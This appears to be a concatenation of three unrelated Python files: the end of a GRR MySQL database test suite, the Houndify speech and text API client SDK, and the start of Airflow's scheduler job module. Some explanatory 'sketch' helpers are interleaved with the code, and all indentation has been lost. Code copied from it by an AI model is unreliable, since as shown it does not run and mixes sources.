"SELECT password FROM grr_users WHERE username = 'user2' FOR UPDATE;")
t2_halfway.set()
self.assertTrue(t1_halfway.wait(5))
cursor.execute("UPDATE grr_users SET password = 'pw1-updated' "
"WHERE username = 'user1';")
cursor.close()
thread_1 = threading.Thread(
target=lambda: self.db.delegate._RunInTransaction(Transaction1))
thread_2 = threading.Thread(
target=lambda: self.db.delegate._RunInTransaction(Transaction2))
thread_1.start()
thread_2.start()
thread_1.join()
thread_2.join()
# Both transactions should have succeeded.
users = self.db.delegate._RunInTransaction(self.ListUsers, readonly=True)
self.assertEqual(users, ((u"user1", "pw1-updated"),
(u"user2", "pw2-updated")))
# At least one should have been retried.
self.assertGreater(sum(counts), 2)
def testSuccessfulCallsAreCorrectlyAccounted(self):
with self.assertStatsCounterDelta(
1, "db_request_latency", fields=["ReadAllGRRUsers"]):
self.db.ReadAllGRRUsers()
# Tests that we don't expect to pass yet.
# TODO(user): Finish implementation and enable these tests.
def testWritePathInfosRawValidates(self):
pass
def testWritePathInfosValidatesClient(self):
pass
def testWritePathInfosMetadata(self):
pass
def testWritePathInfosMetadataTimestampUpdate(self):
pass
def testWritePathInfosStatEntry(self):
pass
def testWritePathInfosExpansion(self):
pass
def testWritePathInfosTypeSeparated(self):
pass
def testWritePathInfosUpdates(self):
pass
def testWritePathInfosUpdatesAncestors(self):
pass
def testMultiWritePathInfos(self):
pass
def testWriteStatHistory(self):
pass
def testWriteHashHistory(self):
pass
def testMultiWriteHistoryEmpty(self):
pass
def testMultiWriteHistoryStatAndHash(self):
pass
def testMultiWriteHistoryTwoPathTypes(self):
pass
def testMultiWriteHistoryTwoPaths(self):
pass
def testMultiWriteHistoryTwoClients(self):
pass
def testMultiWriteHistoryDoesNotAllowOverridingStat(self):
pass
def testMultiWriteHistoryDoesNotAllowOverridingHash(self):
pass
def testMultiWriteHistoryRaisesOnNonExistingPathsForStat(self):
pass
def testMultiWriteHistoryRaisesOnNonExistingPathForHash(self):
pass
def testReadPathInfosNonExistent(self):
pass
def testReadPathInfoNonExistent(self):
pass
def testReadPathInfoTimestampStatEntry(self):
pass
def testReadPathInfosMany(self):
pass
def testWritePathInfosDuplicatedData(self):
pass
def testWritePathInfosStoresCopy(self):
pass
def testListDescendentPathInfosEmptyResult(self):
pass
def testListDescendentPathInfosSingleResult(self):
pass
def testListDescendentPathInfosSingle(self):
pass
def testListDescendentPathInfosBranching(self):
pass
def testListDescendentPathInfosLimited(self):
pass
def testListDescendentPathInfosTypeSeparated(self):
pass
def testListDescendentPathInfosAll(self):
pass
def testListDescendentPathInfosLimitedDirectory(self):
pass
def testListChildPathInfosRoot(self):
pass
def testListChildPathInfosDetails(self):
pass
def testListChildPathInfosDeepSorted(self):
pass
# TODO(hanuszczak): Remove these once support for storing file hashes in
# the MySQL backend is ready.
def testWritePathInfosHashEntry(self):
pass
def testWritePathInfosHashAndStatEntry(self):
pass
def testWritePathInfoHashAndStatEntrySeparateWrites(self):
pass
def testReadPathInfoTimestampHashEntry(self):
pass
def testReadPathInfoTimestampStatAndHashEntry(self):
pass
def testReadingNonExistentBlobReturnsNone(self):
pass
def testSingleBlobCanBeWrittenAndThenRead(self):
pass
def testMultipleBlobsCanBeWrittenAndThenRead(self):
pass
def testWriting80MbOfBlobsWithSingleCallWorks(self):
pass
def testCheckBlobsExistCorrectlyReportsPresentAndMissingBlobs(self):
pass
def testHashBlobReferenceCanBeWrittenAndReadBack(self):
pass
def testReportsNonExistingHashesAsNone(self):
pass
def testCorrectlyHandlesRequestWithOneExistingAndOneMissingHash(self):
pass
def testMultipleHashBlobReferencesCanBeWrittenAndReadBack(self):
pass
def testWritingBlobReferenceToNonExistentPathRaises(self):
pass
def testReadingBlobReferenceFromNonExistentPathReturnsEmptyResult(self):
pass
def testSingleBlobReferenceCanBeWrittenAndThenRead(self):
pass
def testMultipleBlobReferencesCanBeWrittenAndThenRead(self):
pass
def testReadPathInfoOlder(self):
pass
def testReadPathInfosHistoriesEmpty(self):
pass
def testReadPathInfosHistoriesDoesNotRaiseOnUnknownClient(self):
pass
def testReadPathInfosHistoriesWithSingleFileWithSingleHistoryItem(self):
pass
def testReadPathInfosHistoriesWithTwoFilesWithSingleHistoryItemEach(self):
pass
def testReadPathInfosHistoriesWithTwoFilesWithTwoHistoryItems(self):
pass
def testInitPathInfosValidatesClient(self):
pass
def testInitPathInfosEmpty(self):
pass
def testInitPathInfosWriteSingle(self):
pass
def testInitPathInfosWriteMany(self):
pass
def testInitPathInfosTree(self):
pass
def testInitPathInfosClearsStatHistory(self):
pass
def testInitPathInfosClearsHashHistory(self):
pass
def testInitPathInfosRetainsIndirectPathHistory(self):
pass
def testMultiInitPathInfos(self):
pass
def testMultiInitPathInfosEmptyDoesNotThrow(self):
pass
def testMultiInitPathInfosNoPathsDoesNotThrow(self):
pass
def testClearPathHistoryEmpty(self):
pass
def testClearPathHistorySingle(self):
pass
def testClearPathHistoryManyRecords(self):
pass
def testClearPathHistoryOnlyDirect(self):
pass
def testMultiClearPathHistoryEmptyDoesNotRaise(self):
pass
def testMultiClearPathHistoryNoPathsDoesNotRaise(self):
pass
def testMultiClearPathHistoryClearsMultipleHistories(self):
pass
def testFlowWriting(self):
pass
def testFlowWritingUnknownClient(self):
pass
def testPersistentDataUpdate(self):
pass
def testCrashInfoUpdate(self):
pass
def testPendingTerminationUpdate(self):
pass
def testProcessingInformationUpdate(self):
pass
def testRequestWriting(self):
pass
def testResponsesForUnknownFlow(self):
pass
def testResponsesForUnknownRequest(self):
pass
def testResponseWriting(self):
pass
def testResponsesForEarlierRequestDontTriggerFlowProcessing(self):
pass
def testResponsesForLaterRequestDontTriggerFlowProcessing(self):
pass
def testResponsesForExpectedRequestTriggerFlowProcessing(self):
pass
def testResponsesAnyRequestTriggerClientMessageDeletion(self):
pass
def testReadFlowForProcessingThatIsAlreadyBeingProcessed(self):
pass
def testReadFlowForProcessingAfterProcessingTimeExpiration(self):
pass
def testReadFlowForProcessingUpdatesFlowObjects(self):
pass
def testReturnProcessedFlow(self):
pass
def testReadChildFlows(self):
pass
def testRequestWritingHighIDDoesntTriggerFlowProcessing(self):
pass
def testRequestWritingLowIDDoesntTriggerFlowProcessing(self):
pass
def testRequestWritingExpectedIDTriggersFlowProcessing(self):
pass
def testDeleteFlowRequests(self):
pass
def testDeleteAllFlowRequestsAndResponses(self):
pass
def testReadFlowRequestsReadyForProcessing(self):
pass
def testFlowProcessingRequestsQueue(self):
pass
def testFlowProcessingRequestsQueueWithDelay(self):
pass
def testAcknowledgingFlowProcessingRequestsWorks(self):
pass
def testStatusMessagesCanBeWrittenAndRead(self):
pass
def testWritesAndReadsSingleFlowResultOfSingleType(self):
pass
def testWritesAndReadsMultipleFlowResultsOfSingleType(self):
pass
def testWritesAndReadsMultipleFlowResultsWithDifferentTimestamps(self):
pass
def testWritesAndReadsMultipleFlowResultsOfMultipleTypes(self):
pass
def testReadFlowResultsCorrectlyAppliesOffsetAndCountFilters(self):
pass
def testReadFlowResultsCorrectlyAppliesWithTagFilter(self):
pass
def testReadFlowResultsCorrectlyAppliesWithTypeFilter(self):
pass
def testReadFlowResultsCorrectlyAppliesWithSubstringFilter(self):
pass
def testReadFlowResultsCorrectlyAppliesVariousCombinationsOfFilters(self):
pass
def testReadFlowResultsReturnsPayloadWithMissingTypeAsSpecialValue(self):
pass
def testCountFlowResultsReturnsCorrectResultsCount(self):
pass
def testCountFlowResultsCorrectlyAppliesWithTagFilter(self):
pass
def testCountFlowResultsCorrectlyAppliesWithTypeFilter(self):
pass
def testCountFlowResultsCorrectlyAppliesWithTagAndWithTypeFilters(self):
pass
def testWritesAndReadsSingleFlowLogEntry(self):
pass
def testWritesAndReadsMultipleFlowLogEntries(self):
pass
def testReadFlowLogEntriesCorrectlyAppliesOffsetAndCountFilters(self):
pass
def testReadFlowLogEntriesCorrectlyAppliesWithSubstringFilter(self):
pass
def testReadFlowLogEntriesCorrectlyAppliesVariousCombinationsOfFilters(self):
pass
def testCountFlowLogEntriesReturnsCorrectFlowLogEntriesCount(self):
pass
if __name__ == "__main__":
unittest.main()
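# A minimal sketch (not GRR's actual implementation) of the retry-on-deadlock behaviour that
# testRunInTransactionDeadlock above depends on: the transaction callback is re-run when MySQL
# reports a retryable error such as a lock wait timeout (1205), a deadlock (1213) or too many
# concurrent transactions (1637). The `connect` callable and backoff policy are assumptions.
import time
_RETRYABLE_MYSQL_ERRORS = frozenset([1205, 1213, 1637])
def run_in_transaction_sketch(connect, callback, max_attempts=5, backoff=0.05):
  """Runs callback(connection) in a transaction, retrying on retryable MySQL errors."""
  for attempt in range(max_attempts):
    connection = connect()
    try:
      result = callback(connection)
      connection.commit()
      return result
    except MySQLdb.OperationalError as error:
      connection.rollback()
      retryable = error.args and error.args[0] in _RETRYABLE_MYSQL_ERRORS
      if retryable and attempt + 1 < max_attempts:
        time.sleep(backoff * (2 ** attempt))  # simple exponential backoff before retrying
        continue
      raise
    finally:
      connection.close()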
|
houndify.py
|
##############################################################################
# Copyright 2017 SoundHound, Incorporated. All rights reserved.
##############################################################################
import base64
import hashlib
import hmac
import http.client
import json
import threading
import time
import uuid
import urllib.request, urllib.parse, urllib.error
import struct
try:
import pySHSpeex
except ImportError:
pass
HOUND_SERVER = "api.houndify.com"
TEXT_ENDPOINT = "/v1/text"
VOICE_ENDPOINT = "/v1/audio"
VERSION = '1.0.0'
class _BaseHoundClient(object):
def __init__(self, clientID, clientKey, userID, hostname, proxyHost, proxyPort, proxyHeaders):
self.clientID = clientID
self.clientKey = base64.urlsafe_b64decode(clientKey)
self.userID = userID
self.hostname = hostname
self.proxyHost = proxyHost
self.proxyPort = proxyPort
self.proxyHeaders = proxyHeaders
self.HoundRequestInfo = {
'ClientID': clientID,
'UserID': userID,
'SDK': 'python2.7',
'SDKVersion': VERSION
}
def setHoundRequestInfo(self, key, value):
"""
There are various fields in the HoundRequestInfo object that can
be set to help the server provide the best experience for the client.
Refer to the Houndify documentation to see what fields are available
and set them through this method before starting a request
"""
self.HoundRequestInfo[key] = value
def removeHoundRequestInfo(self, key):
"""
Remove request info field through this method before starting a request
"""
self.HoundRequestInfo.pop(key, None)
def setLocation(self, latitude, longitude):
"""
Many domains make use of the client location information to provide
relevant results. This method can be called to provide this information
to the server before starting the request.
latitude and longitude are floats (not string)
"""
self.HoundRequestInfo['Latitude'] = latitude
self.HoundRequestInfo['Longitude'] = longitude
self.HoundRequestInfo['PositionTime'] = int(time.time())
def setConversationState(self, conversation_state):
self.HoundRequestInfo["ConversationState"] = conversation_state
if "ConversationStateTime" in conversation_state:
self.HoundRequestInfo["ConversationStateTime"] = conversation_state["ConversationStateTime"]
def _generateHeaders(self, requestInfo):
requestID = str(uuid.uuid4())
if 'RequestID' in requestInfo:
requestID = requestInfo['RequestID']
timestamp = str(int(time.time()))
if 'TimeStamp' in requestInfo:
timestamp = str(requestInfo['TimeStamp'])
HoundRequestAuth = self.userID + ";" + requestID
h = hmac.new(self.clientKey, (HoundRequestAuth + timestamp).encode('utf-8'), hashlib.sha256)
signature = base64.urlsafe_b64encode(h.digest()).decode('utf-8')
HoundClientAuth = self.clientID + ";" + timestamp + ";" + signature
headers = {
'Hound-Request-Info': json.dumps(requestInfo),
'Hound-Request-Authentication': HoundRequestAuth,
'Hound-Client-Authentication': HoundClientAuth
}
if 'InputLanguageEnglishName' in requestInfo:
headers["Hound-Input-Language-English-Name"] = requestInfo["InputLanguageEnglishName"]
if 'InputLanguageIETFTag' in requestInfo:
headers["Hound-Input-Language-IETF-Tag"] = requestInfo["InputLanguageIETFTag"]
return headers
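# A standalone sketch of the signing scheme implemented by _generateHeaders above, with
# illustrative parameter names: the string "userID;requestID" plus a Unix timestamp is signed
# with HMAC-SHA256 using the urlsafe-base64-decoded client key, and the urlsafe-base64-encoded
# digest becomes part of the Hound-Client-Authentication header.
def sketch_auth_headers(client_id, client_key_b64, user_id, request_id, timestamp):
    decoded_key = base64.urlsafe_b64decode(client_key_b64)
    request_auth = user_id + ";" + request_id
    mac = hmac.new(decoded_key, (request_auth + timestamp).encode('utf-8'), hashlib.sha256)
    signature = base64.urlsafe_b64encode(mac.digest()).decode('utf-8')
    return {
        'Hound-Request-Authentication': request_auth,
        'Hound-Client-Authentication': client_id + ";" + timestamp + ";" + signature,
    }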
class TextHoundClient(_BaseHoundClient):
"""
TextHoundClient is used for making text queries for Hound
"""
def __init__(self, clientID, clientKey, userID, requestInfo = dict(), hostname = HOUND_SERVER, proxyHost = None, proxyPort = None, proxyHeaders = None):
_BaseHoundClient.__init__(self, clientID, clientKey, userID, hostname, proxyHost, proxyPort, proxyHeaders)
self.HoundRequestInfo.update(requestInfo)
def query(self, query):
"""
Make a text query to Hound.
query is the string of the query
"""
headers = self._generateHeaders(self.HoundRequestInfo)
if self.proxyHost:
conn = http.client.HTTPSConnection(self.proxyHost, self.proxyPort)
conn.set_tunnel(self.hostname, headers = self.proxyHeaders)
else:
conn = http.client.HTTPSConnection(self.hostname)
conn.request('GET', TEXT_ENDPOINT + '?query=' + urllib.parse.quote(query), headers = headers)
resp = conn.getresponse()
raw_response = resp.read()
try:
parsedMsg = json.loads(raw_response)
return parsedMsg
except ValueError:
return { "Error": raw_response }
class HoundListener(object):
"""
HoundListener is an abstract base class that defines the callbacks
that can be received while streaming speech to the server
"""
def onPartialTranscript(self, transcript):
"""
onPartialTranscript is fired when the server has sent a partial transcript
in live transcription mode. 'transcript' is a string with the partial transcript
"""
pass
def onFinalResponse(self, response):
"""
onFinalResponse is fired when the server has completed processing the query
and has a response. 'response' is the JSON object (as a Python dict) which
the server sends back.
"""
pass
def onError(self, err):
"""
onError is fired if there is an error interacting with the server. It contains
the parsed JSON from the server.
"""
pass
class StreamingHoundClient(_BaseHoundClient):
"""
StreamingHoundClient is used to send streaming audio to the Hound
server and receive live transcriptions back
"""
def __init__(self, clientID, clientKey, userID, requestInfo = dict(), hostname = HOUND_SERVER, sampleRate = 16000, useSpeex = False, proxyHost = None, proxyPort = None, proxyHeaders = None):
"""
clientID and clientKey are "Client ID" and "Client Key"
from the Houndify.com web site.
"""
_BaseHoundClient.__init__(self, clientID, clientKey, userID, hostname, proxyHost, proxyPort, proxyHeaders)
self.sampleRate = sampleRate
self.useSpeex = useSpeex
self.HoundRequestInfo['PartialTranscriptsDesired'] = True
self.HoundRequestInfo.update(requestInfo)
def setSampleRate(self, sampleRate):
"""
Override the default sample rate of 16 khz for audio.
NOTE that only 8 khz and 16 khz are supported
"""
if sampleRate == 8000 or sampleRate == 16000:
self.sampleRate = sampleRate
else:
raise Exception("Unsupported sample rate")
def start(self, listener=HoundListener()):
"""
This method is used to make the actual connection to the server and prepare
for audio streaming.
listener is a HoundListener (or derived class) object
"""
self.audioFinished = False
self.lastResult = None
self.buffer = b''
if self.proxyHost:
self.conn = http.client.HTTPSConnection(self.proxyHost, self.proxyPort)
self.conn.set_tunnel(self.hostname, headers = self.proxyHeaders)
else:
self.conn = http.client.HTTPSConnection(self.hostname)
self.conn.putrequest('POST', VOICE_ENDPOINT)
headers = self._generateHeaders(self.HoundRequestInfo)
headers['Transfer-Encoding'] = 'chunked'
for header in headers:
self.conn.putheader(header, headers[header])
self.conn.endheaders()
self.callbackTID = threading.Thread(target = self._callback, args = (listener,))
self.callbackTID.start()
audio_header = self._wavHeader(self.sampleRate)
if self.useSpeex:
audio_header = pySHSpeex.Init(self.sampleRate == 8000)
self._send(audio_header)
def fill(self, data):
"""
After successfully connecting to the server with start(), pump PCM samples
through this method.
data is 16-bit, 8 KHz/16 KHz little-endian PCM samples.
Returns True if the server detected the end of audio and is processing the data
or False if the server is still accepting audio
"""
# buffer gets flushed on next call to start()
if self.audioFinished:
return True
self.buffer += data
# 20ms 16-bit audio frame = (2 * 0.02 * sampleRate) bytes
frame_size = int(2 * 0.02 * self.sampleRate)
while len(self.buffer) > frame_size:
frame = self.buffer[:frame_size]
if self.useSpeex:
frame = pySHSpeex.EncodeFrame(frame)
self._send(frame)
self.buffer = self.buffer[frame_size:]
return False
def finish(self):
"""
Once fill returns True, call finish() to finalize the transaction. finish will
wait for all the data to be received from the server.
After finish() is called, you can start another request with start() but each
start() call should have a corresponding finish() to wait for the threads
"""
self._send(b'')
self.callbackTID.join()
return self.lastResult
def _callback(self, listener):
read_headers = True
headers = ''
body = ''
for line in self._readline(self.conn.sock):
if read_headers:
headers += line
if headers.endswith('\r\n\r\n'):
read_headers = False
continue
body += line
parsedMsg = None
try:
parsedMsg = json.loads(line)
except ValueError:
continue
if type(parsedMsg) is not dict:
continue
if "Status" in parsedMsg and parsedMsg["Status"] == "Error":
self.lastResult = parsedMsg
listener.onError(parsedMsg)
self.audioFinished = True
return
if "Format" in parsedMsg:
if parsedMsg["Format"] == "SoundHoundVoiceSearchParialTranscript" or parsedMsg["Format"] == "HoundVoiceQueryPartialTranscript":
## also check SafeToStopAudio
listener.onPartialTranscript(parsedMsg["PartialTranscript"])
if "SafeToStopAudio" in parsedMsg and parsedMsg["SafeToStopAudio"]:
## Because of the GIL, simple flag assignment like this is atomic
self.audioFinished = True
if parsedMsg["Format"] == "SoundHoundVoiceSearchResult" or parsedMsg["Format"] == "HoundQueryResult":
self.lastResult = parsedMsg
listener.onFinalResponse(parsedMsg)
return
self.lastResult = { "Error": body }
listener.onError({ "Error": body })
self.audioFinished = True
def _wavHeader(self, sampleRate=16000):
# Build the fields as bytes so the header can be concatenated with struct.pack output.
genHeader = b"RIFF"
genHeader += struct.pack('<L', 36) #ChunkSize - dummy
genHeader += b"WAVE"
genHeader += b"fmt "
genHeader += struct.pack('<L', 16) #Subchunk1Size
genHeader += struct.pack('<H', 1) #AudioFormat - PCM
genHeader += struct.pack('<H', 1) #NumChannels
genHeader += struct.pack('<L', sampleRate) #SampleRate
genHeader += struct.pack('<L', 8 * sampleRate) #ByteRate
genHeader += struct.pack('<H', 2) #BlockAlign
genHeader += struct.pack('<H', 16) #BitsPerSample
genHeader += b"data"
genHeader += struct.pack('<L', 0) #Subchunk2Size - dummy
return genHeader
def _send(self, msg):
# msg is a bytes chunk; frame it with the HTTP chunked-encoding length prefix.
if self.conn:
chunkSize = ("%x\r\n" % len(msg)).encode('utf-8')
try:
self.conn.send(chunkSize)
self.conn.send(msg + b'\r\n')
except Exception:
self.conn.close()
self.conn = None
def _readline(self, socket):
# The socket yields bytes; buffer them, split on CRLF and hand decoded lines to _callback.
_buffer = b''
while True:
more = socket.recv(4096)
if not more: break
_buffer += more
while True:
split_buffer = _buffer.split(b"\r\n", 1)
if len(split_buffer) == 1: break
_buffer = split_buffer[1]
yield split_buffer[0].decode('utf-8') + "\r\n"
if _buffer: yield _buffer.decode('utf-8')
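# A usage sketch for StreamingHoundClient following the start()/fill()/finish() contract in the
# docstrings above: feed little-endian 16-bit PCM in small chunks until fill() returns True,
# then call finish() for the final result. Credentials, file name and the 44-byte WAV header
# skip are placeholders/assumptions for illustration.
class _PrintingListener(HoundListener):
    def onPartialTranscript(self, transcript):
        print("partial:", transcript)
    def onFinalResponse(self, response):
        print("got final response")
    def onError(self, err):
        print("error:", err)
def _example_stream_wav(path='speech_16k_mono.wav'):
    client = StreamingHoundClient('YOUR_CLIENT_ID', 'YOUR_CLIENT_KEY', 'example_user', sampleRate=16000)
    client.start(_PrintingListener())
    with open(path, 'rb') as audio:
        audio.read(44)  # skip the WAV container header; the client writes its own header
        while True:
            chunk = audio.read(2048)
            if not chunk or client.fill(chunk):
                break
    return client.finish()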
|
scheduler_job.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from datetime import timedelta
from time import sleep
from past.builtins import basestring
import six
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.orm.session import make_transient
from airflow.configuration import conf
from airflow import executors, models, settings
from airflow.exceptions import AirflowException, TaskNotFound
from airflow.jobs.base_job import BaseJob
from airflow.models import DagRun, SlaMiss, errors
from airflow.settings import Stats
from airflow.ti_deps.dep_context import DepContext, SCHEDULED_DEPS
from airflow.operators.dummy_operator import DummyOperator
from airflow.ti_deps.deps.pool_slots_available_dep import STATES_TO_COUNT_AS_RUNNING
from airflow.utils import asciiart, helpers, timezone
from airflow.utils.dag_processing import (AbstractDagFileProcessor,
DagFileProcessorAgent,
SimpleDag,
SimpleDagBag,
SimpleTaskInstance,
list_py_file_paths)
from airflow.utils.db import provide_session
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.state import State
from typing import List
from airflow import DAG
from airflow.models import DagModel, DagBag
from airflow.models.serialized_dag import SerializedDagModel
from airflow.settings import MIN_SERIALIZED_DAG_UPDATE_INTERVAL
from sqlalchemy.orm import Session
class DagFileProcessor(AbstractDagFileProcessor, LoggingMixin, MultiprocessingStartMethodMixin):
"""Helps call SchedulerJob.process_file() in a separate process.
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: unicode
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: list[unicode]
:param zombies: zombie task instances to kill
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(self, file_path, pickle_dags, dag_ids, zombies):
self._file_path = file_path
# The process that was launched to process the given file path.
self._process = None
self._dag_ids = dag_ids
self._pickle_dags = pickle_dags
self._zombies = zombies
# The result of Scheduler.process_file(file_path).
self._result = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time = None
# This ID is used to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessor.class_creation_counter
DagFileProcessor.class_creation_counter += 1
@property
def file_path(self):
return self._file_path
@staticmethod
def _run_file_processor(result_channel,
file_path,
pickle_dags,
dag_ids,
thread_name,
zombies):
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: unicode
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_ids: if specified, only examine DAG ID's that are
in this list
:type dag_ids: list[unicode]
:param thread_name: the name to use for the process that is launched
:type thread_name: unicode
:param zombies: zombie task instances to kill
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
:return: the process that was launched
:rtype: multiprocessing.Process
"""
# This helper runs in the newly created process
log = logging.getLogger("airflow.processor")
stdout = StreamLogWriter(log, logging.INFO)
stderr = StreamLogWriter(log, logging.WARN)
set_context(log, file_path)
setproctitle("airflow scheduler - DagFileProcessor {}".format(file_path))
try:
# redirect stdout/stderr to log
sys.stdout = stdout
sys.stderr = stderr
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
start_time = time.time()
log.info("Started process (PID=%s) to work on %s",
os.getpid(), file_path)
scheduler_job = SchedulerJob(dag_ids=dag_ids, log=log)
result = scheduler_job.process_file(file_path,
zombies,
pickle_dags)
result_channel.send(result)
end_time = time.time()
log.info(
"Processing %s took %.3f seconds", file_path, end_time - start_time
)
except Exception:
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
result_channel.close()
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
def start(self):
"""
Launch the process and start processing the DAG.
"""
if six.PY2:
context = multiprocessing
else:
start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(start_method)
self._parent_channel, _child_channel = context.Pipe()
self._process = context.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
self.file_path,
self._pickle_dags,
self._dag_ids,
"DagFileProcessor{}".format(self._instance_id),
self._zombies
),
name="DagFileProcessor{}-Process".format(self._instance_id)
)
self._start_time = timezone.utcnow()
self._process.start()
def kill(self):
"""
Kill the process launched to process the file, and ensure consistent state.
"""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
# The queue will likely get corrupted, so remove the reference
self._result_queue = None
self._kill_process()
def terminate(self, sigkill=False):
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
if six.PY2:
self._process.join(5)
else:
from contextlib import suppress
with suppress(TimeoutError):
self._process._popen.wait(5) # pylint: disable=protected-access
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self):
if self._process.is_alive():
self.log.warning("Killing PID %s", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
@property
def pid(self):
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self):
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self):
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
pass
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self):
"""
:return: result of running SchedulerJob.process_file()
:rtype: airflow.utils.dag_processing.SimpleDag
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self):
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
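# A self-contained sketch (not Airflow code) of the parent/child pattern DagFileProcessor uses
# above: run work in a separate process, send the result back over a multiprocessing Pipe, and
# let the parent poll for completion without blocking. The worker below is illustrative only.
def _child_worker_sketch(result_channel, payload):
    try:
        result_channel.send(payload.upper())  # stand-in for SchedulerJob.process_file()
    finally:
        result_channel.close()
def run_in_child_process_sketch(payload):
    parent_channel, child_channel = multiprocessing.Pipe()
    process = multiprocessing.Process(target=_child_worker_sketch, args=(child_channel, payload))
    process.start()
    result = None
    while True:
        if parent_channel.poll(0.1):
            try:
                result = parent_channel.recv()
            except EOFError:  # child exited without sending a result
                pass
            break
        if not process.is_alive():  # child died before producing anything
            break
    process.join()
    parent_channel.close()
    return result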
class SchedulerJob(BaseJob):
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: unicode
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[unicode]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: unicode
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param run_duration: how long to run (in seconds) before exiting
:type run_duration: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {
'polymorphic_identity': 'SchedulerJob'
}
heartrate = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
dag_id=None,
dag_ids=None,
subdir=settings.DAGS_FOLDER,
num_runs=conf.getint('scheduler', 'num_runs', fallback=-1),
processor_poll_interval=conf.getfloat(
'scheduler', 'processor_poll_interval', fallback=1),
run_duration=None,
do_pickle=False,
log=None,
*args, **kwargs):
"""
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: unicode
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[unicode]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: unicode
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
# for BaseJob compatibility
self.dag_id = dag_id
self.dag_ids = [dag_id] if dag_id else []
if dag_ids:
self.dag_ids.extend(dag_ids)
self.subdir = subdir
self.num_runs = num_runs
self.run_duration = run_duration
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super(SchedulerJob, self).__init__(*args, **kwargs)
self.max_threads = conf.getint('scheduler', 'max_threads')
if log:
self._log = log
self.using_sqlite = False
self.using_mysql = False
if conf.get('core', 'sql_alchemy_conn').lower().startswith('sqlite'):
self.using_sqlite = True
